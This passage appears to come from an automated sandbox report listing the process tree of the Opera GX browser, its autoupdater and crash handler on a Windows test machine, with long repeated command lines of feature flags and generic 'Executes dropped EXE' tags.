--with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7264,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=7480 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4756
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7424,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=7740 /prefetch:82⤵
- Executes dropped EXE
PID:4268
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6340,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=7892 /prefetch:82⤵
- Executes dropped EXE
PID:2584
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8040,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=8080 /prefetch:82⤵
- Executes dropped EXE
PID:5048
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7428,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=8228 /prefetch:82⤵
- Executes dropped EXE
PID:4280
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7920,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=8372 /prefetch:82⤵
- Executes dropped EXE
PID:3496
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8072,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=8512 /prefetch:82⤵
- Executes dropped EXE
PID:1980
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=8664,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=8696 /prefetch:22⤵
- Executes dropped EXE
PID:3892
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8864,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=8896 /prefetch:82⤵
- Executes dropped EXE
PID:5700
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5972,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=9028 /prefetch:82⤵
- Executes dropped EXE
PID:4888
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8880,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=9180 /prefetch:82⤵
- Executes dropped EXE
PID:2432
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8868,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=9320 /prefetch:82⤵
- Executes dropped EXE
PID:4256
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" --pipeid=oauc_pipebbf75761f34e48ef16427d916ed763c82⤵
- Executes dropped EXE
PID:8180 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ff60529f8f4,0x7ff60529f900,0x7ff60529f9103⤵
- Executes dropped EXE
PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8848,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:82⤵
- Executes dropped EXE
PID:3480
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=4848,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=9588 /prefetch:82⤵
- Executes dropped EXE
PID:6192
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9804,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=9800 /prefetch:82⤵
- Executes dropped EXE
PID:6556
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9740,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=9928 /prefetch:82⤵PID:6604
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3b41⤵PID:3040
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe" --scheduledautoupdate --autoupdaterequesttype=automatic --autoupdateoperaversion=109.0.5097.98 --newautoupdaterlogic1⤵
- Executes dropped EXE
PID:7584 -
C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\installer.exe" --version2⤵
- Executes dropped EXE
PID:6272
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --edition=std-2 --pipeid=oauc_task_pipec12dca2c6d0f4844aad7502765c89329 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC" --scheduledtask2⤵
- Executes dropped EXE
PID:6316 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\Crash Reports" --crash-count-file=C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\crash_count.txt --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ff60529f8f4,0x7ff60529f900,0x7ff60529f9103⤵
- Executes dropped EXE
PID:6368
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\installer.exe" --version3⤵PID:1844
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"1⤵PID:3668
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --ran-launcher --started-from-shortcut2⤵PID:400
-
